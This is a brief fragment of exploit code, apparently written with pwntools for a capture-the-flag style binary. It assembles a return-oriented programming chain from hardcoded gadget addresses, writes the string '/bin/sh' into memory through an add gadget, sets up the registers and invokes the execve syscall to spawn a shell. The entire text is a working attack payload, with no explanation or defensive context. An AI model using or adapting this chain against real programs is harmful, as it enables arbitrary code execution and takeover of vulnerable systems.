payload = p64(0x430653)
#0x0000000000430653: pop rax; ret; 
payload += p64(0x40125c)+p64(0x41eb06)
# 0x000000000041eb06: pop rbx; pop rbp; jmp rax; 
payload += p64(0x6e69622f)+p64(0x4510ad)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x430653)
# 0x0000000000430653: pop rax; ret; 
payload += p64(0x40125c)+p64(0x41eb06)
# 0x000000000041eb06: pop rbx; pop rbp; jmp rax; 
payload += p64(0x68662f)+p64(0x4510b1)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x430653)
# 0x0000000000430653: pop rax; ret; 
payload += p64(0x0)+p64(0x407455)
# 0x0000000000407455: xchg eax, edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x451070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x430653)
# 0x0000000000430653: pop rax; ret; 
payload += p64(0x3b)+p64(0x43538d)
# 0x000000000043538d: syscall; 
payload += b''
